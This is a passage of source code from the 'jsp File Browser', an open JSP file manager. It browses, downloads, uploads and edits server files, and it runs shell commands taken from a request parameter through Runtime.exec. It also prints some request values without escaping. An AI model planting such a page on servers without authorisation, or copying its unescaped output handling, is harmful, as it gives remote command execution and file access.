stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
/**
* This class is a comparator to sort the filenames and dirs
*/
class FileComp implements Comparator {
int mode;
int sign;
FileComp() {
this.mode = 1;
this.sign = 1;
}
/**
* @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
* The default sorting method is by Name
* Negative mode means descending sort
*/
FileComp(int mode) {
if (mode < 0) {
this.mode = -mode;
sign = -1;
}
else {
this.mode = mode;
this.sign = 1;
}
}
public int compare(Object o1, Object o2) {
File f1 = (File) o1;
File f2 = (File) o2;
if (f1.isDirectory()) {
if (f2.isDirectory()) {
switch (mode) {
//Filename or Type
case 1:
case 4:
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
//Filesize
case 2:
return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
//Date
case 3:
return sign
* (new Long(f1.lastModified())
.compareTo(new Long(f2.lastModified())));
default:
return 1;
}
}
else return -1;
}
else if (f2.isDirectory()) return 1;
else {
switch (mode) {
case 1:
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
case 2:
return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
case 3:
return sign
* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
case 4: { // Sort by extension
int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
}
// f1 has no extension
else if (tempIndexf1 == -1) return -sign;
// f2 has no extension
else if (tempIndexf2 == -1) return sign;
// Both have an extension
else {
String tempEndf1 = f1.getAbsolutePath().toUpperCase()
.substring(tempIndexf1);
String tempEndf2 = f2.getAbsolutePath().toUpperCase()
.substring(tempIndexf2);
return sign * tempEndf1.compareTo(tempEndf2);
}
}
default:
return 1;
}
}
}
}
/**
* Wrapperclass to wrap an OutputStream around a Writer
*/
class Writer2Stream extends OutputStream {
Writer out;
Writer2Stream(Writer w) {
super();
out = w;
}
public void write(int i) throws IOException {
out.write(i);
}
public void write(byte[] b) throws IOException {
for (int i = 0; i < b.length; i++) {
int n = b[i];
//Convert byte to ubyte
n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
out.write(n);
}
}
public void write(byte[] b, int off, int len) throws IOException {
for (int i = off; i < off + len; i++) {
int n = b[i];
n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
out.write(n);
}
}
} //End of class Writer2Stream
static Vector expandFileList(String[] files, boolean inclDirs) {
Vector v = new Vector();
if (files == null) return v;
for (int i = 0; i < files.length; i++)
v.add(new File(URLDecoder.decode(files[i])));
for (int i = 0; i < v.size(); i++) {
File f = (File) v.get(i);
if (f.isDirectory()) {
File[] fs = f.listFiles();
for (int n = 0; n < fs.length; n++)
v.add(fs[n]);
if (!inclDirs) {
v.remove(i);
i--;
}
}
}
return v;
}
/**
* Method to build an absolute path
* @param dir the root dir
* @param name the name of the new directory
* @return if name is an absolute directory, returns name, else returns dir+name
*/
static String getDir(String dir, String name) {
if (!dir.endsWith(File.separator)) dir = dir + File.separator;
File mv = new File(name);
String new_dir = null;
if (!mv.isAbsolute()) {
new_dir = dir + name;
}
else new_dir = name;
return new_dir;
}
/**
* This Method converts a byte size in a kbytes or Mbytes size, depending on the size
* @param size The size in bytes
* @return String with size and unit
*/
static String convertFileSize(long size) {
int divisor = 1;
String unit = "bytes";
if (size >= 1024 * 1024) {
divisor = 1024 * 1024;
unit = "MB";
}
else if (size >= 1024) {
divisor = 1024;
unit = "KB";
}
if (divisor == 1) return size / divisor + " " + unit;
String aftercomma = "" + 100 * (size % divisor) / divisor;
if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
return size / divisor + "." + aftercomma + " " + unit;
}
/**
* Copies all data from in to out
* @param in the input stream
* @param out the output stream
* @param buffer copy buffer
*/
static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
copyStreamsWithoutClose(in, out, buffer);
in.close();
out.close();
}
/**
* Copies all data from in to out
* @param in the input stream
* @param out the output stream
* @param buffer copy buffer
*/
static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
throws IOException {
int b;
while ((b = in.read(buffer)) != -1)
out.write(buffer, 0, b);
}
/**
* Returns the Mime Type of the file, depending on the extension of the filename
*/
static String getMimeType(String fName) {
fName = fName.toLowerCase();
if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
else if (fName.endsWith(".gif")) return "image/gif";
else if (fName.endsWith(".pdf")) return "application/pdf";
else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
else if (fName.endsWith(".avi")) return "video/x-msvideo";
else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
else if (fName.endsWith(".zip")) return "application/zip";
else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
else if (fName.endsWith(".rtf")) return "application/rtf";
else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
else if (fName.endsWith(".png")) return "image/png";
else if (fName.endsWith(".xml")) return "text/xml";
else if (fName.endsWith(".svg")) return "image/svg+xml";
else if (fName.endsWith(".mp3")) return "audio/mp3";
else if (fName.endsWith(".ogg")) return "audio/ogg";
else return "text/plain";
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String conv2Html(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
/**
* Starts a native process on the server
* @param command the command to start the process
* @param dir the dir in which the process starts
*/
static String startProcess(String command, String dir) throws IOException {
StringBuffer ret = new StringBuffer();
String[] comm = new String[3];
comm[0] = COMMAND_INTERPRETER[0];
comm[1] = COMMAND_INTERPRETER[1];
comm[2] = command;
long start = System.currentTimeMillis();
try {
//Start process
Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
//Get input and error streams
BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
boolean end = false;
while (!end) {
int c = 0;
while ((ls_err.available() > 0) && (++c <= 1000)) {
ret.append(conv2Html(ls_err.read()));
}
c = 0;
while ((ls_in.available() > 0) && (++c <= 1000)) {
ret.append(conv2Html(ls_in.read()));
}
try {
ls_proc.exitValue();
//if the process has not finished, an exception is thrown
//else
while (ls_err.available() > 0)
ret.append(conv2Html(ls_err.read()));
while (ls_in.available() > 0)
ret.append(conv2Html(ls_in.read()));
end = true;
}
catch (IllegalThreadStateException ex) {
//Process is running
}
//The process is not allowed to run longer than given time.
if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
ls_proc.destroy();
end = true;
ret.append("!!!! Process has timed out, destroyed !!!!!");
}
try {
Thread.sleep(50);
}
catch (InterruptedException ie) {}
}
}
catch (IOException e) {
ret.append("Error: " + e);
}
return ret.toString();
}
/**
* Converts a dir string to a linked dir string
* @param dir the directory string (e.g. /usr/local/httpd)
* @param browserLink web-path to Browser.jsp
*/
static String dir2linkdir(String dir, String browserLink, int sortMode) {
File f = new File(dir);
StringBuffer buf = new StringBuffer();
while (f.getParentFile() != null) {
if (f.canRead()) {
String encPath = URLEncoder.encode(f.getAbsolutePath());
buf.insert(0, "<a href=\"" + browserLink + "?sort=" + sortMode + "&amp;dir="
+ encPath + "\">" + conv2Html(f.getName()) + File.separator + "</a>");
}
else buf.insert(0, conv2Html(f.getName()) + File.separator);
f = f.getParentFile();
}
if (f.canRead()) {
String encPath = URLEncoder.encode(f.getAbsolutePath());
buf.insert(0, "<a href=\"" + browserLink + "?sort=" + sortMode + "&amp;dir=" + encPath
+ "\">" + conv2Html(f.getAbsolutePath()) + "</a>");
}
else buf.insert(0, f.getAbsolutePath());
return buf.toString();
}
/**
* Returns true if the given filename tends towards a packed file
*/
static boolean isPacked(String name, boolean gz) {
return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
.endsWith(".war"));
}
/**
* If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
*/
static boolean isAllowed(File path, boolean write) throws IOException{
if (READ_ONLY && write) return false;
if (RESTRICT_BROWSING) {
StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
while (stk.hasMoreTokens()){
if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
return RESTRICT_WHITELIST;
}
return !RESTRICT_WHITELIST;
}
else return true;
}
//---------------------------------------------------------------------------------------------------------------
%>
<%
//Get the current browsing directory
request.setAttribute("dir", request.getParameter("dir"));
// The browser_name variable is used to keep track of the URI
// of the jsp file itself. It is used in all link-backs.
final String browser_name = request.getRequestURI();
final String FOL_IMG = "";
boolean nohtml = false;
boolean dir_view = true;
//Get Javascript
if (request.getParameter("Javascript") != null) {
dir_view = false;
nohtml = true;
//Tell the browser that it should cache the javascript
response.setHeader("Cache-Control", "public");
Date now = new Date();
SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US);
response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2)));
response.setHeader("Content-Type", "text/javascript");
%>
<%// This section contains the Javascript used for interface elements %>
var check = false;
<%// Disables the checkbox feature %>
function dis(){check = true;}
var DOM = 0, MS = 0, OP = 0, b = 0;
<%// Determine the browser type %>
function CheckBrowser(){
if (b == 0){
if (window.opera) OP = 1;
// Moz or Netscape
if(document.getElementById) DOM = 1;
// Micro$oft
if(document.all && !OP) MS = 1;
b = 1;
}
}
<%// Allows the whole row to be selected %>
function selrow (element, i){
var erst;
CheckBrowser();
if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild;
else if (DOM==1) erst = element.firstChild.nextSibling.firstChild;
<%// MouseIn %>
if (i==0){
if (erst.checked == true) element.className='mousechecked';
else element.className='mousein';
}
<%// MouseOut %>
else if (i==1){
if (erst.checked == true) element.className='checked';
else element.className='mouseout';
}
<% // MouseClick %>
else if ((i==2)&&(!check)){
if (erst.checked==true) element.className='mousein';
else element.className='mousechecked';
erst.click();
}
else check=false;
}
<%// Filter files and dirs in FileList%>
function filter (begriff){
var suche = begriff.value.toLowerCase();
var table = document.getElementById("filetable");
var ele;
for (var r = 1; r < table.rows.length; r++){
ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,"");
if (ele.toLowerCase().indexOf(suche)>=0 )
table.rows[r].style.display = '';
else table.rows[r].style.display = 'none';
}
}
<%//(De)select all checkboxes%>
function AllFiles(){
for(var x=0;x < document.FileList.elements.length;x++){
var y = document.FileList.elements[x];
var ytr = y.parentNode.parentNode;
var check = document.FileList.selall.checked;
if(y.name == 'selfile' && ytr.style.display != 'none'){
if (y.disabled != true){
y.checked = check;
if (y.checked == true) ytr.className = 'checked';
else ytr.className = 'mouseout';
}
}
}
}
function shortKeyHandler(_event){
if (!_event) _event = window.event;
if (_event.which) {
keycode = _event.which;
} else if (_event.keyCode) {
keycode = _event.keyCode;
}
var t = document.getElementById("text_Dir");
//z
if (keycode == 122){
document.getElementById("but_Zip").click();
}
//r, F2
else if (keycode == 113 || keycode == 114){
var path = prompt("Please enter new filename", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Ren").click();
}
//c
else if (keycode == 99){
var path = prompt("Please enter filename", "");
if (path == null) return;
t.value = path;
document.getElementById("but_NFi").click();
}
//d
else if (keycode == 100){
var path = prompt("Please enter directory name", "");
if (path == null) return;
t.value = path;
document.getElementById("but_NDi").click();
}
//m
else if (keycode == 109){
var path = prompt("Please enter move destination", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Mov").click();
}
//y
else if (keycode == 121){
var path = prompt("Please enter copy destination", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Cop").click();
}
//l
else if (keycode == 108){
document.getElementById("but_Lau").click();
}
//Del
else if (keycode == 46){
document.getElementById("but_Del").click();
}
}
function popUp(URL){
fname = document.getElementsByName("myFile")[0].value;
if (fname != "")
window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes")
}
document.onkeypress = shortKeyHandler;
<% }
// View file
else if (request.getParameter("file") != null) {
File f = new File(request.getParameter("file"));
if (!isAllowed(f, false)) {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
}
else if (f.exists() && f.canRead()) {
if (isPacked(f.getName(), false)) {
//If zipFile, do nothing here
}
else{
String mimeType = getMimeType(f.getName());
response.setContentType(mimeType);
if (mimeType.equals("text/plain")) response.setHeader(
"Content-Disposition", "inline;filename=\"temp.txt\"");
else response.setHeader("Content-Disposition", "inline;filename=\""
+ f.getName() + "\"");
BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[8 * 1024];
out.clearBuffer();
OutputStream out_s = new Writer2Stream(out);
copyStreamsWithoutClose(fileInput, out_s, buffer);
fileInput.close();
out_s.flush();
nohtml = true;
dir_view = false;
}
}
else {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "File " + f.getAbsolutePath()
+ " does not exist or is not readable on the server");
}
}
// Download selected files as zip file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
Vector v = expandFileList(request.getParameterValues("selfile"), false);
//Check if all files in vector are allowed
String notAllowedFile = null;
for (int i = 0;i < v.size(); i++){
File f = (File) v.get(i);
if (!isAllowed(f, false)){
notAllowedFile = f.getAbsolutePath();
break;
}
}
if (notAllowedFile != null){
request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
}
else if (v.size() == 0) {
request.setAttribute("error", "No files selected");
}
else {
File dir_file = new File("" + request.getAttribute("dir"));
int dir_l = dir_file.getAbsolutePath().length();
response.setContentType("application/zip");
response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
out.clearBuffer();
ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
zipout.setLevel(COMPRESSION_LEVEL);
for (int i = 0; i < v.size(); i++) {
File f = (File) v.get(i);
if (f.canRead()) {
zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[0xffff];
copyStreamsWithoutClose(fr, zipout, buffer);
/* int b;
while ((b=fr.read())!=-1) zipout.write(b);*/
fr.close();
zipout.closeEntry();
}
}
zipout.finish();
out.flush();
nohtml = true;
dir_view = false;
}
}
// Download file
else if (request.getParameter("downfile") != null) {
String filePath = request.getParameter("downfile");
File f = new File(filePath);
if (!isAllowed(f, false)){
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
}
else if (f.exists() && f.canRead()) {
response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+ "\"");
response.setContentLength((int) f.length());
BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[8 * 1024];
out.clearBuffer();
OutputStream out_s = new Writer2Stream(out);
copyStreamsWithoutClose(fileInput, out_s, buffer);
fileInput.close();
out_s.flush();
nohtml = true;
dir_view = false;
}
else {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "File " + f.getAbsolutePath()
+ " does not exist or is not readable on the server");
}
}
if (nohtml) return;
//else
// If no parameter is submitted, it will take the path from jsp file browser
if (request.getAttribute("dir") == null) {
String path = null;
if (application.getRealPath(request.getRequestURI()) != null) {
File f = new File(application.getRealPath(request.getRequestURI())).getParentFile();
//This is a hack needed for tomcat
while (f != null && !f.exists())
f = f.getParentFile();
if (f != null)
path = f.getAbsolutePath();
}
if (path == null) { // handle the case where we are not in a directory (ex: war file)
path = new File(".").getAbsolutePath();
}
//Check path
if (!isAllowed(new File(path), false)){
//TODO Blacklist
if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
}
request.setAttribute("dir", path);
}%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="robots" content="noindex">
<meta http-equiv="expires" content="0">
<meta http-equiv="pragma" content="no-cache">
<%
//If a cssfile exists, it will take it
String cssPath = null;
if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
application.getRealPath(request.getRequestURI())).getParent()
+ File.separator + CSS_NAME;
if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
if (new File(cssPath).exists()) {
%>
<link rel="stylesheet" type="text/css" href="<%=CSS_NAME%>">
<%}
else if (request.getParameter("uplMonitor") == null) {%>
<style type="text/css">
input.button {background-color: #c0c0c0; color: #666666;
border: 1px solid #999999; margin: 5px 1px 5px 1px;}
input.textfield {margin: 5px 1px 5px 1px;}
input.button:Hover { color: #444444 }
table.filelist {background-color:#666666; width:100%; border:0px none #ffffff}
.formular {margin: 1px; background-color:#ffffff; padding: 1em; border:1px solid #000000;}
.formular2 {margin: 1px;}
th { background-color:#c0c0c0 }
tr.mouseout { background-color:#ffffff; }
tr.mousein { background-color:#eeeeee; }
tr.checked { background-color:#cccccc }
tr.mousechecked { background-color:#c0c0c0 }
td { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
td.message { background-color: #FFFF00; color: #000000; text-align:center; font-weight:bold}
td.error { background-color: #FF0000; color: #000000; text-align:center; font-weight:bold}
A { text-decoration: none; }
A:Hover { color : Red; text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style>
<%}
//Check path
if (!isAllowed(new File((String)request.getAttribute("dir")), false)){
request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
}
//Upload monitor
else if (request.getParameter("uplMonitor") != null) {%>
<style type="text/css">
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style><%
String fname = request.getParameter("uplMonitor");
//First opening
boolean first = false;
if (request.getParameter("first") != null) first = true;
UplInfo info = new UplInfo();
if (!first) {
info = UploadMonitor.getInfo(fname);
if (info == null) {
//Windows
int posi = fname.lastIndexOf("\\");
if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
}
if (info == null) {
//Unix
int posi = fname.lastIndexOf("/");
if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
}
}
dir_view = false;
request.setAttribute("dir", null);
if (info.aborted) {
UploadMonitor.remove(fname);
%>
</head>
<body>
<b>Upload of <%=fname%></b><br><br>
Upload aborted.</body>
</html><%
}
else if (info.totalSize != info.currSize || info.currSize == 0) {
%>
<META HTTP-EQUIV="Refresh" CONTENT="<%=UPLOAD_MONITOR_REFRESH%>;URL=<%=browser_name %>?uplMonitor=<%=URLEncoder.encode(fname)%>">
</head>
<body>
<b>Upload of <%=fname%></b><br><br>
<center>
<table height="20px" width="90%" bgcolor="#eeeeee" style="border:1px solid #cccccc"><tr>
<td bgcolor="blue" width="<%=info.getPercent()%>%"></td><td width="<%=100-info.getPercent()%>%"></td>
</tr></table></center>
<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).<br>
Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
</body>
</html><%
}
else {
UploadMonitor.remove(fname);
%>
</head>
<body onload="javascript:window.close()">
<b>Upload of <%=fname%></b><br><br>
Upload finished.
</body>
</html><%
}
}
//Comandwindow
else if (request.getParameter("command") != null) {
if (!NATIVE_COMMANDS){
request.setAttribute("error", "Execution of native commands is not allowed!");
}
else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
%>
<title>Launch commands in <%=request.getAttribute("dir")%></title>
</head>
<body><center>
<h2><%=LAUNCH_COMMAND %></h2><br />
<%
out.println("<form action=\"" + browser_name + "\" method=\"Post\">\n"
+ "<textarea name=\"text\" wrap=\"off\" cols=\"" + EDITFIELD_COLS
+ "\" rows=\"" + EDITFIELD_ROWS + "\" readonly>");
String ret = "";
if (!request.getParameter("command").equalsIgnoreCase(""))
ret = startProcess(
request.getParameter("command"), (String) request.getAttribute("dir"));
out.println(ret);
%></textarea>
<input type="hidden" name="dir" value="<%= request.getAttribute("dir")%>">
<br /><br />
<table class="formular">
<tr><td title="Enter your command">
Command: <input size="<%=EDITFIELD_COLS-5%>" type="text" name="command" value="">
</td></tr>
<tr><td><input class="button" type="Submit" name="Submit" value="Launch">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
<input type="Submit" class="button" name="Submit" value="Cancel"></td></tr>
</table>
</form>
<br />
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
</center>
</body>
</html>
<%
dir_view = false;
request.setAttribute("dir", null);
}
}
//Click on a filename, special viewer (zip+jar file)
else if (request.getParameter("file") != null) {
File f = new File(request.getParameter("file"));
if (!isAllowed(f, false)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
else if (isPacked(f.getName(), false)) {
//ZipFile
try {
ZipFile zf = new ZipFile(f);
Enumeration entries = zf.entries();
%>
<title><%= f.getAbsolutePath()%></title>
</head>
<body>
<h2>Content of <%=conv2Html(f.getName())%></h2><br />
<table class="filelist" cellspacing="1px" cellpadding="0px">
<th>Name</th><th>Uncompressed size</th><th>Compressed size</th><th>Compr. ratio</th><th>Date</th>
<%
long size = 0;
int fileCount = 0;
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
if (!entry.isDirectory()) {
fileCount++;
size += entry.getSize();
long ratio = 0;
if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
/ entry.getSize();
out.println("<tr class=\"mouseout\"><td>" + conv2Html(entry.getName())
+ "</td><td>" + convertFileSize(entry.getSize()) + "</td><td>"
+ convertFileSize(entry.getCompressedSize()) + "</td><td>"
+ ratio + "%" + "</td><td>"
+ dateFormat.format(new Date(entry.getTime())) + "</td></tr>");
}
}
zf.close();
//No directory view
dir_view = false;
request.setAttribute("dir", null);
%>
</table>
<p align=center>
<b><%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
</b></p>
</body></html>
<%
}
catch (ZipException ex) {
request.setAttribute("error", "Cannot read " + f.getName()
+ ", no valid zip file");
}
catch (IOException ex) {
request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+ ex);
}
}
}
// Upload
else if ((request.getContentType() != null)
&& (request.getContentType().toLowerCase().startsWith("multipart"))) {
if (!ALLOW_UPLOAD){
request.setAttribute("error", "Upload is forbidden!");
}
response.setContentType("text/html");
HttpMultiPartParser parser = new HttpMultiPartParser();
boolean error = false;
try {
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser
.processData(request.getInputStream(), bound, tempdir, clength);
if (!isAllowed(new File((String)ht.get("dir")), false)){
//This is a hack, cos we are writing to this directory
request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
error = true;
}
else if (ht.get("myFile") != null) {
FileInfo fi = (FileInfo) ht.get("myFile");
File f = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted) {
f.delete();
request.setAttribute("error", "Upload aborted");
}
else {
// Move file from temp to the right dir
String path = (String) ht.get("dir");
if (!path.endsWith(File.separator)) path = path + File.separator;
if (!f.renameTo(new File(path + f.getName()))) {
request.setAttribute("error", "Cannot upload file.");
error = true;
f.delete();
}
}
}
else {
request.setAttribute("error", "No file selected for upload");
error = true;
}
request.setAttribute("dir", (String) ht.get("dir"));
}
catch (Exception e) {
request.setAttribute("error", "Error " + e + ". Upload aborted");
error = true;
}
if (!error) request.setAttribute("message", "File upload correctly finished.");
}
// The form to edit a text file
else if (request.getParameter("editfile") != null) {
File ef = new File(request.getParameter("editfile"));
if (!isAllowed(ef, true)){
request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
}
else{
%>
<title>Edit <%=conv2Html(request.getParameter("editfile"))%></title>
</head>
<body>
<center>
<h2>Edit <%=conv2Html(request.getParameter("editfile"))%></h2><br />
<%
BufferedReader reader = new BufferedReader(new FileReader(ef));
String disable = "";
if (!ef.canWrite()) disable = " readonly";
out.println("<form action=\"" + browser_name + "\" method=\"Post\">\n"
+ "<textarea name=\"text\" wrap=\"off\" cols=\"" + EDITFIELD_COLS
+ "\" rows=\"" + EDITFIELD_ROWS + "\"" + disable + ">");
String c;
// Write out the file and check if it is a win or unix file
int i;
boolean dos = false;
boolean cr = false;
while ((i = reader.read()) >= 0) {
out.print(conv2Html(i));
if (i == '\r') cr = true;
else if (cr && (i == '\n')) dos = true;
else cr = false;
}
reader.close();
//No File directory is shown
request.setAttribute("dir", null);
dir_view = false;
%></textarea><br /><br />
<table class="formular">
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
<tr><td colspan="2"><input type="radio" name="lineformat" value="dos" <%= dos?"checked":""%>>Ms-Dos/Windows
<input type="radio" name="lineformat" value="unix" <%= dos?"":"checked"%>>Unix
<input type="checkbox" name="Backup" checked>Write backup</td></tr>
<tr><td title="Enter the new filename"><input type="text" name="new_name" value="<%=ef.getName()%>">
<input type="Submit" name="Submit" value="Save"></td>
</form>
<form action="<%=browser_name%>" method="Post">
<td align="left">
<input type="Submit" name="Submit" value="Cancel">
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
</td>
</form>
</tr>
</table>
</center>
<br />
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
</body>
</html>
<%
}
}
// Save or cancel the edited file
else if (request.getParameter("nfile") != null) {
File f = new File(request.getParameter("nfile"));
if (request.getParameter("Submit").equals("Save")) {
